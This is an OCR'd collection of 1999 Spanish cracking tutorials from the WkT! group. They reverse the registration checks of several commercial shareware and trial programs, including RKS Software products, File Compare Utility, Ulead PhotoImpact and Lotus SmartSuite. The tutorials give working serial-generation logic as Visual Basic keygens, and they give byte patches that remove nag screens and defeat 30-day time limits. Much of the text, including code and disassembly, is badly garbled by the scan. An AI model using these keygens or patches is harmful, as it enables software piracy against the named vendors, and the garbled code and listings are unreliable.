serie y como traducir del Win32Asm a cualquier lenguaje de Alto Nivel la rutina, 
con el objeto de crear un KeyMaker para este programa. 


vin 


Toma de contacto 


En la misma pantalla para entrar el número de serie, nos encontramos que el 
programador nos dice (hehehehehe, nos elimina trabajo) que el serial debe empezar 
con ANM- Perfecto si no te quieres romper la cabeza y encontrar el serial con un 
simple SEARCH 0 L FFFF- FFEFF 'ANM-' despues de haber producido el error 
pertinente que nos da la entrada de un serial falso, luego entramos de nuevo en Soft- 
Ice y aplicamos la búsqueda. :-O 


Penetrando dentro de código 
Bien, para ahorrar tiempo y complejidad al tutorial, diré que existe una rutina que conviente el nick en 


mayuscúlas. Asi pues, comencemos con nuestra tarea. 


Entramos en Soft-Ice previo BPX HMEMC?PY y seguimos con los pasos reglamen- tarios que todos 
ya conocemos. 


Ok!, Ya hemos llegado. Las direcciones que aqui se mostrarán son ficticias, solo para uso informativo. 
Bien, nos encontramos con la rutina de cración de Serial: 


49368B MOV ECX, [EBP-04] ; Almacena tu nick en registro EAX. 
Lo MOVZX ECX, BYTE PTR [EAX+ECX-01]; Almacena cada uno de los caracteres del nick. 


a. IMUL ECX, ECX, 7B0; Multiplica y deja en Ecx, el valor de Ecx * 1968 (el año de nacimiento 
de tu novia Mr.WhitE 2??? muahahahahahahahahahahaha!!!!). 


Ci JNO 49369D; Salta si no hay overflow. 

a CALL 402DC4; Y sino se mete aki, algo hace (no soy curioso, pero lo supongo, lo)). 
49369D IMUL ECX, EAX; Valor inicial de EAX =1, es un contador. 

ci JNO 493647; Salta si no hay overflow. 

Li CALL 402DC4; Lo mismo de arriba ! 


493647 ADD EBX, ECX; Suma a EBX, valor inicial = AF48 = 8008, ECX. En EBX se almacena lo 
que va a ser la 2? parte del serial, osease, el serial number. :))))) 


a JNO 4936B0, Salta si no hay overflow. 

oo CALL 402DC4; 

4936B0 INC EAX; Incrementamos el contador. 

a DEC EDX; Decrementamos un segundo contador (long. nick) 


ao JNZ 493688; Salta si no es 0, al inicio de la rutina. 


OOOO OOOO 


Pos bueno, yastá, entendida la rutina que genera el serial correcto, podemos hacer en cualquier 


lenguaje de alto nivel el Keygen correspondiente a este programilla Software. Solo hay que recordar 


que el NICK debe estar en mayúsculas y qye empieza por ANM- 
Valga un sencillo ejemplo en VBasic, 0k?, a lo bestia y sin depurar. :-O 


Private Sub Command1_Click() 

ebx+ = 8008 ' valor inicial de ebx 

vit = 1968 ' valor inicial 7B0 en Hexadecimal. 

1 = Len(Text1.Text) ' Longitud del nick 

nick$ = UCase$(Text1.Text) ' Convertimos en mayúsculas el nick 
eaxHf = 1 ' valor inicial del contador. 

For x= 1 To 1 'Iniciamos un bucle contando el número de caracteres. 


ecxtt = Asc((Mid$(nick$, x, 1))) almacenamos el valor ASCH de cada caracter del nick. ecxHf = ecx+HH * 


vf' Lo multiplicamos por 1968 y lo dejamos donde está, en ECX+*. 

ecxHt = ecxtf * eaxff' Lo multiplicamos por el contador, resultado en ECX*, 
ebx+f = ebxtf + ecxff' variable donde se va acumulando el serial number. 
eaxtf = eaxtt + 1 ' Incrementamos el contador. 

Next ' siguienteeeeeee.....!!!!!! 


Y he akis el Serial Number para tu propio nick : 


Text2.Text = '""ANM-" + TrimS(Str$(ebx+t)) 


End Sub 


Y ya está todo hecho Newbies ;-). AstalaVista 


Mid ======== 2% PERSONAL GREETZ A *-*-*-======= dE 
A todos los Crackers del pasado, del presente y del futuro. 


(En ezpecial a loz kabroneZ de WkT!) 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa | Programa ¡Todos los 'Todos los productos RKS Software 'Todos los productos RKS Software Software | W95/W98/NT /1W98 / NT 
Como crear un KeyMaker para cada uno de los productos de esta casa ETSN software que 
Descripción 
no cambia el esquema de protección aunque se vayan al carajo. :-) 
o Tipo Lo Tipo [Número ¡Número de serie y 30 dias de prueba serie y 30 dias de ¡Número de serie y 30 dias de prueba 


Un up Iv ssofvare CO 


Introducción 


En este tutorial aprenderemos a entender una simple rutina de generación de número 
de serie y en consecuencia, crear un keymaker. 


Went 


Toma de contacto 


Bueno, bueno, bueno. Increible, pero cierto. Después de tropecientas versiones de 
los mismos appz, estos señores programadores no cambian el patron de "defensa", 
pese a que too dios es capaz de romper sus líneas de combate. Lo peor de todo es 
que ellos mismos, al entrar un serial falso te dicen que el número de serie debe 
empezar con RKS-, lamentable y aburrido, no?. 


Abrete sésamo 


Bueno, no os voy a aburrir con los detalles de código de los programs, iremos directos al grano que es 
lo que nos interesa. Bástenos saber que despues de la rutina que convierte en mayúsculas el nick viene 
la rutina de generación del verdadero código. 


Todos los apps de RKS tiene la misma rutina de generación del Serial, ok?, lo único que les diferencias 
es un pequeño valor almancenado en EBP-10. 


Entramos en Soft-Ice previo BPX HMEMCPY y seguimos con los pasos reglamen- tarios que todos 
ya conocemos. Vámos traceando hasta que llegemos a la rutina de conversión en mayusculas del nick, 
así pues, a partir de ahi iremos traceando con F8 con el objeto de ir metiendonos en cada uno de los 
CALL que nos encontremos en el camino. 


Ok!, Ya hemos llegado. Las direcciones que aqui se mostrarán son ficticias, solo para uso informativo. 
Bien, nos encontramos con la rutina de cración de Serial: 


404594 MOV EAX, [EBP-0C] ; Almacena tu nick en registro EAX. 

ii MOV AL, [ECX+EAX-01]; Almacena en AL cada uno de los caracteres. 
o CMP AL, 20; Mira si el carácter en AL es espacio en blanco, " ". 
is JZ 004C45AB; Salta al contador más abajo. 


on AND EAX, FF; Límpia EAX, dejándo AL ocupado con el carácter. 


o IMUL EAX, [EBP-10]; Aquí le duele :) El valor almacenado en EBP varía de programa a 
programa. Hacemos ? EBP-10 y nos dará el valor decimal del multi- plicando. Resultado 
almacenado en EAX. 


Lo DEC EAX; Decrementa EAX en 1: EAX=EAX-1. 


amooo ADD ESL EAX; Suma ESI (valor inicial = 0) con EAX. Valor acumulativo. Aqui está el 
Serial correcto que se debe añadir a RSK-. 


4ACASAB INC ECX; Contador que incrementas hasta alcanzar la longitud del nick. 
TOS DEC EDX; Contador que almacena la long. del nick EDX=EDX-1; 


am JNZ 004C4594; Mientras no se alcance 0, salta al inicio de la rutina. 


OOOO 


Bien, entendida la rutina que genera el serial correcto, podemos hacer en cualquier lenguaje de alto 
nivel el Keygen correspondiente a cada uno de los appz de RKS Software. Solo hay que recordar que 
el NICK debe estar en mayúsculas, que es espacio en blanco, " " no es caculado y que incrementa el 
contador y sobre todo que en ESI se almacena el Serial. :-) 


Valga un sencillo ejemplo en VBasic, 0k?, a lo bestia y sin depurar. :-O 


Private Sub Command1_Click() 

ebp* = 5961 “Este valor es el predeterminado para Visual Business Cards v3.2i. 
z= Len(Text1.Text) ' Almacena en 1 la longitud del nick en Textl.Text. 

n$ = UCase$(Text1.Text ' Convertimos el nick en mayúsculas. 

For x= 1 To z ' Sustituimos los contadores ECX y EDX por un bucle. 

eaxt = Asc((Mid$(n$, x, 1))) ' Almacenamos en EAX cada uno de los cracteres. 
If eaxf = 32 Then GoTo s' Comprobamos si hay espacios en blanco y saltamos. 
eaxtf = eaxtt * ebp* ' Multiplicamos por 5961 

eax!f = eaxtf - 1 ' Restamos a EAX, 1 

esitt = esitt + eaxf' Almcenamos en ESTI el valor que será el Serial 

s: Next 

Text2.Text = "RKS-" + Trim$(Str$(esitt)) He aquí el Serial para tu nick. 


Y ya está todo hecho :-). A partir de ahora podeis crear Keygens para todos los productos RKS 


Hi h======== 5 PERSONAL GREETZ *-*-*-*-======== ae 
A todos los Crackers del pasado, del presente y del futuro. 


(En ezpecial a loz kabroneZ de WkT!) 
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progrAmA File Compare Utility 3.0.002 W95 
DEsCripCión Programa para comparar ficheros. 
tipo Shareware (25 $) 


url http://www.oneysoft.com 


| protECCión  |Nag-screen sino estás registrado. 

| hErrAmiEntAs — [Softlce 3.22, JavaSerip 
oBjEtivo Hacer un Generador de Claves (KeyGen). 

ARE MB 

Po BBCRA de Marzo de 


Introducción 


El programa no tiene limitaciones por no estar registrado, pero aparece una nag- 
screen cada vez que se arranca el programa. Hay una opción para registrarse, 
introduciendo el nombre, la empresa y la clave. 


El objetivo será localizar la rutina de validación de la clave, comprenderla, y hacer 
un generador de claves. 


We 


Al Atake 


Lo primero es ver cómo reacciona el programa al intentar registrarnos. 

Ponemos un nombre, empresa y clave cualquiera, y nos aparece un mensaje de clave incorrecta. 

El mensaje es el típico MessageBox de windows, lo cual nos facilita el poder acercarnos a la rutina de 
comprobación de la clave. 

Así pues, vamos al SoftIce(Ctrl+D) ponemos el breakpoint(BPX MessageBoxA) y volvemos al 
programa(Ctrl+D). 


Intentamos registrarnos nuevamente para ver si nuestro breakpoint hace efecto. 

Efectivamente, aparecemos en el Softlce, en la rutina MessageBoxA de la USER32.DLL del windows. 
Le damos a la tecla F12 para ver quién ha llamado a esta rutina. 

Después de un Enter, ya estamos en la parte del código del programa FCOMPARE 


Con un par más de F12 nos situaremos en 014F:00408FCO, y unas líneas antes podemos ver una parte 
interesante del código : 


014F:00408F9B 8B45E8 MOV EAX, [EBP-18] ¿Clave 
014F:00408F9E  8B4DEO MOV ECX, [EBP-20] ¡Empresa 
014F:00408FA1 50 PUSH EAX 

014F:00408FA2 8B55E4 MOV EDX, [EBP-1C] ¿Nombre 
014F:00408FA5 51 PUSH ECX 

014F:00408FA6 52 PUSH EDX 

014F:00408FA7 E854020000 CALL 00409200 ¿¡ValidaClave 
014F:00408FAC 83C40C ADD ESP, 0C 

014F:00408FAF 85C0 TEST EAX, EAX 

014F:00408FB1 “7531 JNZ 00408FE4 
014F:00408FB3 6A11 PUSH sl 

014F:00408FB5 A1DC5D4400 MOV EAX, [00445DDC] 
014F:00408FBA 50 PUSH EAX 

014F:00408FBB E8706B0000 CALL 0040FB30 
014F:00408FC0  83C408 ADD ESP,08 


Así pues, la validación de la clave introducida se hace en la rutina que empieza en :409200 

Vamos pallí.... Ponemos un breakpoint en :408FA7 haciendo doble clic en esa línea, quitamos el anterior 
breakpoint con BD 0, y retornamos al programa con FS5. 

Volvemos a registrarnos, y el Softlce se parará por el breakpoint. Podemos ver los datos que se le pasan a 
la rutina de validación mirando el contenido de eax, ecx y edx (D EDX) 

Con ES entramos en la rutina de :409200 


Lo primero que hace, es verificar que la clave tenga exactamente 8 posiciones. 

Luego comprueba que sólo contenga letras de '0' a'9', de 'a' a'f, y de 'A' a'F”. 

Seguidamente las va acumulando en ESL, de tal manera que al final ESI=Clave. 

Entonces calcula un número en función de la empresa, que guarda en EDI. Luego calcula otro número esta 
vez en función del nombre, que se suma a EDI. 

Finalmente a EDI se le suma ESTI, y se incrementa en 1. En estos momentos, si EDI vale O, la clave se 


considera válida, sinó es incorrecta. Todo esto se puede ver en : 


014F:00409200 56 PUSH ESI 
014F:00409201 57 PUSH EDI 
014F:00409202 33F6 XOR ESI,ESI ¡¿ ESI=0 


014F:00409204 8B"7C2414 MOV EDI, [ESP+14] 


014F: 
014F: 
014F': 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F': 
014F: 
014F': 
014F: 
014F: 
014F: 
014F': 
014F: 
014F': 
014F: 
014F': 
014F': 
014F': 
014F': 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F': 
014F: 
014F: 
014F: 
014F: 
014F: 
014F': 
014F': 
014F: 
014F: 
014F: 
014F': 
014F': 
014F: 
014F: 
014F: 
014F: 
014F: 
014F': 
014F: 
014F': 
014F: 


00409208 
00409209 
0040920F 
00409212 
00409214 
00409216 
00409217 
00409218 
00409219 
0040921B 
0040921C 
0040921E 
00409220 
00409223 
00409225 
00409227 
00409229 
0040922B 
0040922E 
00409231 
00409233 
00409235 
00409237 
00409239 
0040923B 
0040923E 
00409241 
00409243 
00409245 
00409247 
00409249 
0040924B 
0040924E 
00409251 
00409253 
00409255 
00409256 
00409258 
0040925A 
0040925E 
0040925F 
00409264 
00409267 
00409269 
0040926D 
0040926E 
00409273 
00409276 
00409278 
0040927A 
0040927B 
0040927E 


57 


rr1548A84400 


83F808 
7405 
33C0 
SF 

SE 

Cc3 
8A07 
47 
84C0 
743A 
C1E604 
3C30 
7C0C 
3C39 
7F08 
OFBECO 
83E830 
EB1E 
3Cc61 
7C0C 
3C66 
7F08 
OFBECO 
83E857 
EBOE 
3C41 
7C3E 
3C46 
7E3A 
OFBECO 
83E837 
03F0 
8A07 
47 
84C0 
75C6 
8B442410 
50 
E83CFEFFFFF 
83C404 
8BF8 
8B44240C 
50 
E82DFFFFEFF 
83C404 
03F8 
O3FE 
47 
83FF01 
SF 


PUSH 
CALL 
CMP 
JZ 
XOR 
POP 
POP 
RET 
MOV 
INC 
TEST 
yz 
SHL 
CMP 
JL 
CMP 
JG 
MOVSX 
SUB 
JMP 
CMP 
JL 
CMP 
JG 
MOVSX 
SUB 
JMP 
CMP 
JL 
CMP 
JG 
MOVSX 
SUB 
ADD 
MOV 
INC 
TEST 
JNZ 
MOV 
PUSH 
CALL 
ADD 
MOV 
MOV 
PUSH 
CALL 
ADD 
ADD 
ADD 
INC 
CMP 
POP 


EDI 


[KERNEL32!1strlen] 


EAX, 08 
00409219 
EAX, EAX 
EDI 

ESI 


L/ [EDT] 
DI 

L,AL 
040925A 
SI,04 
1,30 
0409233 
AL, 39 
00409233 
EAX, AL 
EAX, 30 
00409251 
AL, 61 
00409243 
AL,66 
00409243 
EAX, AL 
EAX, 57 
00409251 
AL UT 
00409285 
AL,46 
00409285 
EAX, AL 
EAX, 37 
ESI,EAX 
AL, [EDI] 
EDI 

AL, AL 
00409220 


op HÉm¿o0pubusp?> 


EAX, [ESP+10] 


EAX 
004091A0 
ESP, 04 

EDI,EAX 


EAX, [ESP+0C] 


EAX 
004091A0 
ESP, 04 
EDI,EAX 
EDI,ESI 
EDI 
EDI,01 
EDI 


¡Clave de 8 posiciones? 


¡Clave incorrecta 


¿Comprueba letra 


¡Entre 'A' 


¡Y CE 


¡Añade letra a ESI 


¡Bucle para las 8 letras 
¡Empresa (n*1) 


¿Calcula Número 


¡EDI = n*1 
¡Nombre (n*2) 


¿Calcula Número 


¿¡EDI=n*1 + n*2 

¡EDI=n*1 + n*2 + ESI 
¡EDI=n*1 + n*%2 + ESI + 1 
¡¿Assigna el BitDeAcarreo 


014F: 
014F: 
014F: 
014F': 
014F': 
014F: 
014F': 
014F: 


0040927F 
00409281 
00409282 
00409284 
00409285 
00409287 
00409288 
00409289 


1BC0 
SE 
F7D8 
Cc3 
33C0 
SF 
SE 
Cc3 


SBB 
POP 
NEG 
RET 
XOR 
POP 
POP 
RET 


EAX, EAX ¡EAX=EAX-EAX-BitDeAcarreo 
ESI 

EAX ¡Pone EAX=1 si Clave OK 
EAX,EAX ¡Clave incorrecta 

EDI 

ESI 


Así pues, n”_Empresa + n*_Nombre + n*_Clave + 1 = 0 determina que la clave sea correcta. 

O lo que es lo mismo, que Clave = - n%_Empresa - n_Nombre - 1 

Ahora ya sabemos cómo se calcula la clave, pero para poder hacer el generador de claves, necesitamos 
saber cómo se calcula el número en función del nombre y la empresa. 

De ello se encarga la rutina que empieza en :4091A0 : 


014F: 
014F: 
014F': 
014F': 
014F: 
014F: 
014F': 
014F: 
014F: 
014F: 
014F: 
014F': 
014F: 
014F': 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F': 
014F': 
014F': 
014F: 
014F: 
014F': 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 


004091A0 
004091A1 
004091A2 
004091A4 
004091A8 
004091A9 
004091AF 
004091B2 
004091B4 
004091B6 
004091B9 
004091C0 
004091C2 
004091C4 
004091C”7 
004091C8 
004091CA 
004091CD 
004091CF 
004091D1 
004091D4 
004091DB 
004091DD 
004091DF 
004091E2 
004091E6 
004091E8 
004091E9 
004091EB 
004091EE 
004091F0 
004091F2 
004091F4 
004091F5 
004091F7 
004091F8 


56 

37 

33FF 
8B74240C 
56 


rr1548A84400 


83F804 
7216 
8BC8 
C1E902 


8D148D00000000 


2BC2 
033E 
83C604 
49 
75F8 
83F802 
721€ 
8BDO 
C1EAO1 


8D0C5500000000 


2BC1 
33C9 
830602 
668B4EFE 
03F9 
4A 
75F2 
83r8g01 
720A 
33C9 
gA0E 
46 
03F9 
48 
75F6 


PUSH ESI 

PUSH EDI 

XOR EDI,EDI 

MOV ESI, [ESP+0C] 

PUSH ESI 

CALL [KERNEL32!1strlen] 

CMP EAX, 04 

JB 004091CA 

MOV ECX, EAX 

SHR ECX, 02 

LEA EDX, [ECX* 4+00000000] 

SsUB EAX, EDX 

ADD EDI, [ESI] 

ADD ESI,04 

DEC ECX 

JNZ 004091C2 

CMP EAX, 02 

JB 004091EB 

MOV EDX, EAX 

SHR EDX, 01 

LEA ECX, [EDX*2+00000000] 

SsUB EAX, ECX 

XOR ECX, ECX 

ADD ESI,02 

MOV CX, [ESI-02] 

ADD EDI, ECX 

DEC EDX 

JNZ 004091DD 

CMP EAX, 01 

JB 004091FA 

XOR ECX, ECX 

MOV CL, [ESI] 

INC ESI 

ADD EDI, ECX 

DEC EAX 
004091F0O 


014F:004091FA 8BC”7 MOV EAX, EDI 


014F:004091FC  5E POP EDI 
014F:004091FD  5E POP ESI 
014F:004091FE C3 RET 


La rutina acaba devolviendo un valor en EAX. Para sus cálculos, utiliza EDI para ir acumulando el código 
ascii de cada carácter de la clave, de la siguiente manera : 

1) Si la clave tiene 4 o más caracteres, acumula en bloques de 4 bytes en orden inverso. 

2) Si quedan 2 o más caracteres no acumulados, se suman en bloques de 2 bytes en orden inverso. 

3) Si queda algún carácter no tratado, también se suma. 


Quizás con un ejemplo se entienda mejor, así que veamos cómo actuaría la rutina con el texto "WKT- 
ECD", que en hexa es: 57 4B 54 2D 45 43 44 


1) EDI=2D544B57 ¡los 4 primeros bytes en orden inverso 
2) +00004345 ¿los 2 siguientes bytes en orden inverso 
3) +00000044 ¡el último byte 


EDI=2D548EE0 ¡valor que devuelve la rutina 


- 
VOM 


Ahora que ya hemos visto todo el proceso para calcular la clave, sólo nos queda 
hacer el Generador de Claves. 

Se puede utilizar cualquier lenguaje de programación para implementar la rutina, 
pero en este caso usaremos el JavaScript, que pese a no ser el más cómodo, nos 
servirá para ver los resultados directamente desde esta página web, sin tener que 
ejecutar ningún programa. 


El Generador de Claves (KeyGen) 


Nombre : 


Empresa : 


Vi Generar Clave Vi 
cavl ] 


Para ver el código fuente del generador de claves, 
mirar la parte de JavaScript al principio del código 
fuente .htm de esta página. 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Ulead Photolmpact v4.12 | WO9S / W98 / NT 


Descripción Programilla para retocar imagenes y demás. 
Tipo Trial de 30 dias 


Url http://www.ulead.com 


Protección Nag Screen. Time Limit 30 Dias 


Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Herramientas Softlce v3.25, W32dasm v8.9, UltraEdit v6.10a 
Objetivo Conseguir que no caduque el programa y NagScreen. 


Cracker Mr.WhiTe [WkT!] 
Fecha 30 de Julio de 1999 


Introducción 


Como cargarnos una Nag Screen sin complicarnos la vida. 
(La protección esta en U32cfg.dll) 


Al Atake 


Al abrir el programa podemos observar que se trata de una version Trial de 30 dias, plenamente operativa, 
con una pesada nag screen del tipo "dialogboxparama". 


Lo primero que vamos a hacer sera eliminar esa nag screen. Para ello ponemos el primer BPX 
dialogboxparama, pulsamos Fl 1 en el Softlce y despues el boton "Try More!". 
Con lo cual aterrizaremos de lleno en: 


* Reference To: USER32.DialogBoxParamA, Ord:008Eh 


:4EBO066CD FF15F4A3B14EÉ Call dword ptr [4EB1A3F4] 
:4EB066D3 898590FDFFFF mov dword ptr [ebp+FFFFFD90], eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :4EB066A2 (C), :4EBO66AB(C) 


* Possible Reference to Dialog: DialogID_0001 


:4EB066D9 B801000000 mov eax, 00000001 
: ¿4EBO66DE E935010000 jmp 4EB06818 


Eliminaremos la Nag Screen sin complicarnos la vida. Sustituimos 


:4EBO066CD FF15F4A3B14E Call dword ptr [4EB1A3F4] 


Por :4EBO66CD 909090909090 


Ahora solo nos queda quitar el limite de 30 dias. :0) 

Adelantamos la fecha de nuestro pc un mes para provocar que el Photolmpact nos caduque y poder ver el 
mensaje de error. 

Vaya, pero si es otra "dialogboxparama" !!! 


Ponemos el segundo BPX dialogboxparama en el Softlce y vemos donde aterriza. ;0) 


* Reference To: USER32.GetActiveWindow, Ord:00D5h 


:4EB0671F FF15C0A3B14E Cal1 dword ptr [4EB1A3C0] 
:4EB06725 50 push eax 


* Possible Reference to Dialog: DialogIlD_0066 


:4EB06726 6A66 push 00000066 
:4EB06728 8B0D0C47B24E mov ecx, dword ptr [4EB2470C] 
:4EB0672E 51 push ecx 


* Reference To: USER32.DialogBoxParamA, Ord:008Eh 


:4EB0672F FF15F4A3B14EÉ Cal1 dword ptr [4EB1A3F4] 
:4EB06735 89858CFDFFFF mov dword ptr [ebp+FFFFFD8C], eax 


:4EB0673B 83BD8CFDFFFF2A cmp dword ptr [ebp+FFFFFD8C], 0000002A 
:4EB06742 751D jne 4EB06761 


Si comparas este trozo de código con el anterior (cuando el programa aún no habia caducado) verás la 
siguiente diferencia: 


:4EB066D9 B801000000 mov eax, 00000001 <-- Buen rollito 
:4EBO066DEÉ E935010000 jmp 4EB06818 


En el primer código se mete en eax el valor 1 y se salta a :4EB06818 
En el segundo código se compara [ebp+FFFFFD8C] con 2A y si no son iguales se saltara a :4EB06761 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :4EB06716(C), :4EB06742(C) 

:4EB06761 33C0 xXOr eax, eax <-- Mal rollito 

:4EB06763 E9B0000000 Jjmp 4EB06818 


Esta claro, ¿no? tenemos que meter el valor 1 en eax y hacer que salte a :4EB06818 
Abrimos el fichero u32cfg.dll con el ultraedit o cualquier otro editor hexa y modificamos lo siguiente: 


En: 

:4EB0672F FF15F4A3B14EÉ Call dword ptr [4EB1A3F4] 
:4EB06735 89858CFDFFFF mov dword ptr [ebp+FFFFFD8C], eax 
Buscamos "FF15F4A3B14E89858CFD" y lo sustituimos por: 


"B801000000E9B0000000" 
con lo que nos queda: 


:4EB0672F B801000000 mov eax, 00000001 
:4EB06735 E9B0000000 jmp 4EB06818 


Voilá! ya está listo para ser evaluado correctamente. 
Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que el autor se haya saltado la 
explicación de algún paso, errores en las direcciones de memoria......etc). 
El objetivo es que aprendas a crackear y que tengas ideas propias. ;0) 


kh +======== 2 PERSONAL GREETZ *-*-*-*-======== E+* 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
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Al Atake 
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Whiskey Kon Tekila 
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Cracker Mr.WhiTe [WkT!] 


Fecha 15 de Julio de 1999 


Introducción 


Mientras buscaba entre mis cds algun programa interesante con el que juguetear un rato, me he topado por 
casualidad con un cd (PCMania n”76) con esta interesante Suite de Lotus. Es curioso, te acostumbras a usar 
el office de Mocosoft y cuando llevas media vida usando esa bazofia descubres una alternativa MUCHO 
MEJOR. Que putada ¿no? en fin.... aun estamos a tiempo de cambiar a LOTUS :0) 


Realmente esta Suite me ha sorprendido gratamente, quiza Lotus deberia hacer una campaña publicitaria mas 
agresiva y dar a conocer mejor sus productos. Yo no se que coño tiene Mocosoft (bueno si lo se, las pelas del 
Gates claro) que embauca a todo el mundo para que usemos esa mierda de programas llenos de bugs. Desde 
luego no sere yo uno de los incautos compradores del Office 2000. Mocosoft apesta :o/ 


WM 


Bien, sin mas preambulos vamos a proceder a ANALIZAR LA PROTECCION empleada por LOTUS en esta SMARTSUITE MILLENIUM 
EDITION :0) 
Se trata de una version Trial de 30 dias, plenamente operativa, con una pesada nag screen del tipo "dialogboxparama”. 


Comenzaremos por el tipico " BPX GETLOCALTIME ” Pulsamos F11 y despues F12 y nuestro Softlce aterriza en: (vemos que esta en el archivo 
LTSMKTO1.DLL) 


* Reference To: KERNEL32.CreateFileA, Ord:002Bh 


0001BDF FF1514B40110 Call dword ptr [1001B414] 
0001BE5 8945F4 mov dword ptr [ebp-0C], eax 
0001BE8 837DF4FF cmp dword ptr [ebp-0C], FEFFFFFFF 


0001BEC 0F84D1010000 
0001BF2 8D45F8 
0001BF5 50 

0001BF6 E8F5140000 
0001BFB 83C404 
0001BFE 8B45F8 
0001C01 8945E8 
0001C04 68408D0110 
0001C09 68388D0110 
0001C0E 68308D0110 
0001C13 8B45F4 
0001C16 50 


* Reference To: KERNEL32.GetFileTime, 


0001C17 FF150CB40110 
0001C1D 6A00 

0001C1F 6A00 

0001C21 8B4510 
0001C24 50 

0001C25 E8D3030000 
0001C2A 83C404 


je 10001DC3 
lea eax, dword 
push eax 


call 100030F0 <--- APARECEMOS AQUI 
add esp, 00000004 


mov eax, dword 


ptr [ebp-08] 


ptr [ebp-08] 


mov dword ptr [ebp-18], eax 


push 10018D40 
push 10018D38 
push 10018D30 
mov eax, dword 
push eax 


| 

Call dword ptr 
push 00000000 
push 00000000 
mov eax, dword 
push eax 

Call 10001FFD 


ptr [ebp-0C] 


[1001B40C] 


ptr [ebp+10] 


add esp, 00000004 


0001C2D 50 push eax 
0001C2E 8B45F4 mov eax, dword ptr [ebp-0C] 
0001c31 50 push eax 


Ord:00DBh <--- Cuando se ha usado el archivo por ultima vez 


* Reference To: KERNEL32.SetFilePointer, Ord:01F8h 


* Possible 


Reference to String Resource ID=00004: 


0001C3E 6A04 
0001C40 8D45F0 
0001C43 50 
0001C44 8B45F4 
0001C47 50 


* Reference To: KERNEL32.ReadFile, 


0001C48 FF1518B40110 
0001C4E 6A00 

0001C50 8D45FC 
0001C53 50 


* Possible Reference to String Resource ID=00004: 


0001C54 6A04 
0001C56 8D45E0 
0001C59 50 
0001C5A 8B45F4 
0001C5D 50 


* Reference To: KERNEL32.ReadFile, 


push 00000004 
lea eax, dword 
push eax 

mov eax, dword 
push eax 


Ord:01B8h 


Call dword ptr 
push 00000000 
lea eax, dword 
push eax 


push 00000004 
lea eax, dword 
push eax 

mov eax, dword 
push eax 


Ord:01B8h 


0001C32 FF15D0B30110 Call dword ptr [1001B3D0] 
0001C38 6A00 push 00000000 

0001C3A 8D45FC lea eax, dword ptr [ebp-04] 
0001C3D 50 push eax 


"ltsuite.exe" 


ptr [ebp-10] 


ptr [ebp-0C] 


[1001B418] <--—-Lee la fecha de instalacion 


ptr [ebp-04] 


"ltsuite.exe" 


ptr [ebp-20] 


ptr [ebp-0C] 


0001C5E FF1518B40110 
0001C64 837DF000 
0001C68 0F8553000000 
0001C6E 8B45E8 


Call dword ptr [1001B418] <---Lee la fecha del ultimo uso 
cmp dword ptr [ebp-10], 00000000 

jne 10001CC1 

mov eax, dword ptr [ebp-18] 


0001C71 50 push eax 
0001C72 8B4510 mov eax, dword ptr [ebp+10] 
0001C75 50 push eax 


0001C76 E898010000 
0001C7B 83C408 
0001C7E 85C0 

0001C80 0F8425000000 


Call 10001E13 

add esp, 00000008 
test eax, eax 

je 10001CAB 


0001C86 8B45E8 mov eax, dword ptr [ebp-18] 
0001C89 8945F0 mov dword ptr [ebp-10], eax 
0001C8C 8B45E8 mov eax, dword ptr [ebp-18] 
0001C8F 8945E0 mov dword ptr [ebp-20], eax 
0001C92 8B450C mov eax, dword ptr [ebp+0C] 
0001C95 25FFFF0000 and eax, 0000FFFF 

0001C9A A33C5B0110 mov dword ptr [10015B3C], eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :10001C68(C) 


:10001CC1 8B45E0 
:10001CC4 3945E8 
:10001CcC7 0F8316000000 


:10001CCD C7053C5B0110FFFFFFFF 


:10001CD7 C745EC00000000 
:10001CDE E966000000 


mov 
cmp 
jnb 
mov 
mov 
jmp 


eax, dword ptr [ebp-20] 


dword ptr [ebp-18], eax <--- Compara fecha actual con fecha limite 


10001CE3 


dword ptr [10015B3C], FFFFFFFF 


[ebp-14], 00000000 
10001D49 


si fecha actual es > fecha limite SALTARA 


* Referenced by a (U)nconditional or 


| :10001CC7 (C) 
| 
:10001CE3 8B450C 
0001CE6 25FFFFO000 
0001CEB 8D0480 
O001CEE 8D04C0 
0001CF1 8D0440 
0001CF4 8D0480 


mov 
and 
lea 
lea 
lea 
lea 


(C)onditional Jump at Address: 


eax, dword ptr 
eax, 0000FFFF 
eax, dword ptr 
eax, dword ptr 
eax, dword ptr 
eax, dword ptr 


ebp+0C] 


eax+4*eax] 
eax+8*eax] 
eax+2*eax] 
eax+4*eax] 


0001CF7 C1E007 shl eax, 07 

0001CFA 0345F0 add eax, dword ptr [ebp-10] 

0001CFD 3B45E8 cmp eax, dword ptr [ebp-18] <-- Compara fecha de instalacion con la fecha actual 
0001D00 0F8316000000 jnb 10001D1C <-- Lo cambiamos a JNE 

0001D06 C7053C5BO110FFFFFFFF mov dword ptr [10015B3C], FFFFFFFF 


* Possible Reference to String Resource ID=00001: "4" 


:10001D10 C745EC01000000 
:10001D17 E92D000000 


mov [ebp-14], 00000001 
jmp 10001D49 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :10001D00(C) 


0001D3C 890D3C5B0110 


mov 


0001D1C 8B45E8 mov eax, dword ptr [ebp-18] 

0001D1F 2B45F0 sub eax, dword ptr [ebp-10] 

0001D22 8945E4 mov dword ptr [ebp-1C], eax 

0001D25 8B4D0C mov ecx, dword ptr [ebp+0C] 

0001D28 81E1FFFF0000 and ecx, 0000FFFF 

0001D2E BB80510100 mov ebx, 00015180 

